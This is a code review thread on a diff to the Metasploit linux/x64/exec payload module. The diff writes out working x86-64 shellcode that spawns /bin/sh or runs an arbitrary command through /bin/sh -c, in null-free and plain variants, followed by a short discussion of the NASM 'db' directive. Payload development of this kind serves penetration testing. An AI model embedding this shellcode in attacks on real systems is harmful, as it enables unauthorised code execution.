modules/payloads/singles/linux/x64/exec.rb

```diff
@@ -5,45 +5,170 @@
-      "\x57"                         + # push   %rdi
-      "\x48\x89\xe6"                 + # mov    %rsp,%rsi
-      "\x0f\x05"                       # syscall
+    cmd             = datastore['CMD'] || ''
+    nullfreeversion = datastore['NullFreeVersion']
+
+    if cmd.empty?
+      #
+      # Builds the exec payload which executes a /bin/sh shell.
+      # execve("/bin/sh", NULL, NULL)
+      #
+      if nullfreeversion
+        # 22 bytes (null-free)
+        payload = <<-EOS
+            mov rax, 0x68732f6e69622f2f
+            cdq                     ; edx = NULL
+
+            push rdx
+            push rax
+            push rsp
+            pop rdi                 ; "//bin/sh\0"
+
+            push rdx
+            pop rsi                 ; NULL
+
+            push 0x3b
+            pop rax
+
+            syscall
+        EOS
+
+      else
+        # 21 bytes (not null-free)
+        payload = <<-EOS
+            mov rax, 0x68732f6e69622f
+            cdq                     ; edx = NULL
+
+            push rax
+            push rsp
+            pop rdi                 ; "/bin/sh\0"
+
+            push rdx
+            pop rsi                 ; NULL
+
+            push 0x3b
+            pop rax
+
+            syscall
+        EOS
+      end
+    else
+      #
+      # Dynamically builds the exec payload based on the user's options.
+      # execve("/bin/sh", ["/bin/sh", "-c", "CMD"], NULL)
+      #
+      pushw_c_opt = "dd 0x632d6866" # pushw 0x632d (metasm doesn't support pushw)
+
+      if nullfreeversion
+        if cmd.length > 0xffff
+          raise RangeError, "CMD length has to be smaller than %d" % 0xffff, caller()
+        end
+        if cmd.length <= 0xff # 255
+          breg = "bl"
+        else
+          breg = "bx"
+          if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes
+            cmd += " "
+          end
+        end
+        mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"
+
+        # 48 bytes without cmd (null-free)
+        payload = <<-EOS
+            mov rax, 0x68732f6e69622f2f
+            cdq                     ; edx = NULL
+
+            jmp tocall              ; jmp/call/pop cmd address
+          afterjmp:
+            pop rbp                 ; "cmd"
+
+            push rdx
+            pop rbx
+            #{mov_cmd_len_to_breg}  ; mov (byte/word) (bl/bx), cmd.length
+            mov [rbp + rbx], dl     ; NUL '\0' terminate cmd
+
+            push rdx
+            #{pushw_c_opt}
+            push rsp
+            pop rsi                 ; "-c\0"
+
+            push rdx
+            push rax
+            push rsp
+            pop rdi                 ; "//bin/sh\0"
+
+            push rdx
+            push rbp
+            push rsi
+            push rdi
+            push rsp
+            pop rsi
+
+            push 0x3b
+            pop rax
+
+            syscall
+          tocall:
+            call afterjmp
+            db "#{cmd}"             ; arbitrary command
```

Comment:
I think the pseudo-instruciton `db` is the most accurate since `cmd` is a stream of bytes.

We can see some examples in https://www.nasm.us/doc/nasmdoc3.html

```
      db    0x55                ; just the byte 0x55 
      db    0x55,0x56,0x57      ; three bytes in succession 
      db    'a',0x55            ; character constants are OK 
      db    'hello',13,10,'$'   ; so are string constants 
```

Reply:
Alright thanks, I spoke to one of my coworkers and they said the same thing so I'll mark this as resolved, just wanted to double check that 👍